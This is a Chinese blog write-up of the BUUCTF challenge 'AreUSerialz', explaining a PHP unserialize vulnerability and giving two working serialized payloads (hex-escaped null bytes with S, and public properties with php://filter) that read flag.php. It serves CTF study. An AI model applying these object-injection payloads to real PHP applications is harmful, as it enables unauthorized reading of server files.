Buuctf[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-09-04 09:27:16 发布
最新推荐文章于 2024-09-04 09:27:16 发布
阅读量3.3k 收藏 1
点赞数 3
分类专栏: CTF web Buuctf 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52653109/article/details/124016115
版权
web 同时被 3 个专栏收录
12 篇文章 0 订阅
订阅专栏
CTF
5 篇文章 1 订阅
订阅专栏
Buuctf
3 篇文章 0 订阅
订阅专栏
本文解析了如何利用PHP7.1+的属性类型不敏感特性,通过构造特殊payload绕过is_valid函数,实现对FileHandler类的文件操作,最终读取flag.php内容。涉及的知识点包括序列化绕过、强弱比较和文件I/O操作。
摘要由CSDN通过智能技术生成

[网鼎杯 2020 青龙组]AreUSerialz
打开题目仔细阅读源码

<?php
  
include("flag.php");
highlight_file(__FILE__); //文件包含,联想到php://filter伪协议读取文件

class FileHandler {
  
    protected $op;//protected保护类,成员可以被自身以及其子类和父类访问
    protected $filename;
    protected $content;
  
    function __construct() {//构造函数
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
  
    public function process() {
        if($this->op == "1") {
            $this->write();
        } 
        else if($this->op == "2") {
            $res = $this->read();//弱比较,如果是op=2,运行read函数,并将运行后的结果赋值res,然后将$res放到output函数中
            $this->output($res);
        }
         else {
            $this->output("Bad Hacker!");
        }
    }
  
    private function write() {//private私有类只能自身访问,无法从外部类访问
        if(isset($this->filename) && isset($this->content))//判断filname和content是否为空 {
            if(strlen((string)$this->content) > 100) {//判断content的长度是否大于100
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);//file_put_contents将一个字符串写入文件
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }
  
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
  
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    function __destruct() {//析构函数 该函数会在类的一个对象被删除时自动调用。
        if($this->op === "2")//强比较必须相等
            $this->op = "1";//1赋值给op
        $this->content = "";//将content至空
        $this->process();
    }
  
}
  
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//ord返回()内字符对应的 Unicode 数值
        //若s字符数组中有字符的编码值不在32~125则报错
            return false;
    return true;
}
  
if(isset($_GET{'str'})) {
  //传参str
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
  
}

思路:构造一个payload去执行read()函数,读取flag.php的内容。
函数绕过:
(1) o p , op, op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验
  利用大写S采用的16进制,来绕过is_valid中对空字节的检查。 //00 替换 %00 。
 (2)强比较和弱比较的利用。将op设置为int型的2,op === "2"为false,op == "2"为true,绕过析构函数中的if判断,同时又可以调用到读文件的流程
于是构造payload
在这里插入图片描述
payload:

O%3A11%3A%22FileHandler%22%3A3%3A%7BS%3A5%3A%22\00%2A\00op%22%3Bi%3A2%3BS%3A11%3A%22\00%2A\00filename%22%3BS%3A8%3A%22flag.php%22%3BS%3A10%3A%22\00%2A\00content%22%3BS%3A0%3A%22%22%3B%7D

抓包:
在这里插入图片描述

法二:
还有一种简单粗暴的方法
利用public绕过,用伪协议读取

   class FileHandler{
   public $op=2;
   public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
   public $content=2;
   }
   $a = new FileHandler();
   echo serialize($a);

payload:

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";i:2;}

php7.1+的新特性,对属性类型不敏感,本地序列化的时候将protected属性改为public进行绕过。
但我不知道师傅们是怎么看出来这道题php版本是7.1+
想了解详情移步:php官网

东方黑手
关注
专栏目录
------已搬运-------BUUCTF:[网鼎杯 2020 青龙]AreUSerialz 1
Zero_Adam的博客
01-31 360
[网鼎杯 2020 青龙]AreUSerialz 1 先记录一下我自己的误区/易错点: __construct() 方法,在unserialize()反序列化之后不执行。。。 尽管他口口声声说 __construct() 在生成一个新的实例时会调用该方法。但仅仅限于 $a = new A() 才成立。反序列出来的不执行该方法 注意PHP的===,和弱类型比较等,这些点可以进行绕过 知识点: 一、序列化中的表征字符型的s,可以替换称S。表示 支持后面的字符串用16进制表示。可在这种情形下,将%0
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 668
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
BUUCTF [网鼎杯 2020 青龙]AreUSerialz
lzu_lfl的博客
09-25 639
BUUCTF [网鼎杯 2020 青龙]AreUSerialz_WP
BUUCTF】AreUSerialz (反序列化)
最新发布
徐徐徐的博客
09-04 615
当遇到不可打印字符被过滤时,有两种方法:PHP版本>=7.2时,可将protected直接修改为public将序列化后的字符串中的%00修改为\00,并将保护类型为protected的变量的变量类型由s改为S。
[网鼎杯 2020 青龙]AreUSerialz
Sk1y的博客
03-02 3040
[网鼎杯 2020 青龙]AreUSerialz 目录 题目:在buu平台上,题目传送门 解题过程: 两个防护: is_valid() destruct()魔术方法 本地进行序列化操作 题目:在buu平台上 解题过程: 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename;
BUUCTF】[网鼎杯 2020 青龙]AreUSerialz
aoao331198的博客
04-07 329
不带演的,直接给出了源代码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $
BUUCTF-[网鼎杯 2020 青龙]AreUSerialz
AndyNoel的博客
04-27 280
BUUCTF-[网鼎杯 2020 青龙]AreUSerialz 看题 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/t
AreUSerialz-[网鼎杯 2020 青龙]-[传送门->BUUCTF]
qwsn
11-23 1711
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
BUUCTF-WEB
ccfly1012的博客
11-02 3883
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf刷题
qq_41788704的博客
10-28 2015
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
BUUCTF——[网鼎杯 2020 青龙]AreUSerialze
Ho1aAs‘s Blog
05-27 308
文章目录利用点代码审计解题完 利用点 unserialize()反序列化public类变量 ==弱比较 代码审计 <?php # 包含flag include("flag.php"); highlight_file(__FILE__); class FileHandler { # 均是protected变量 protected $op; protected $filename; protected $content; # 构造函数,初始化变量,调用proces
buuctf-[网鼎杯 2020 青龙]AreUSerialz(小宇特详解)
小宇的web博客
01-28 2768
buuctf-[网鼎杯 2020 青龙]AreUSerialz(小宇特详解) <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op;//protected受保护的修饰符,被定义为受保护的类成员则可以被其自身以及其子类和父类访问 protected $filename; protected $content; function _
buuctf - [网鼎杯 2020 青龙]AreUSerialz
qq_40860153的博客
10-11 2715
1.题目源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
网鼎杯2020[青龙]--AreUSerialz
Oavinci的博客
06-28 7114
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
允许外网访问青龙面板
10-10
要允许外网访问青龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,青龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:打开青龙面板的配置文件 `config/auth.json`,将 `address` 字段的值修改为 `0.0.0.0`,表示监听所有可用的网络接口。 3. 配置登录验证:如果您希望对外网访问青龙面板进行登录验证,可以在 `config/auth.json` 文件中修改 `whitelist` 字段,添加允许访问的IP地址或IP段。 4. 重启青龙面板:保存配置文件后,重新启动青龙面板,使配置生效。 请注意,开放面板的外网访问涉及到网络安全风险,请确保您对服务器和青龙面板进行适当的安全防护和访问控制。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值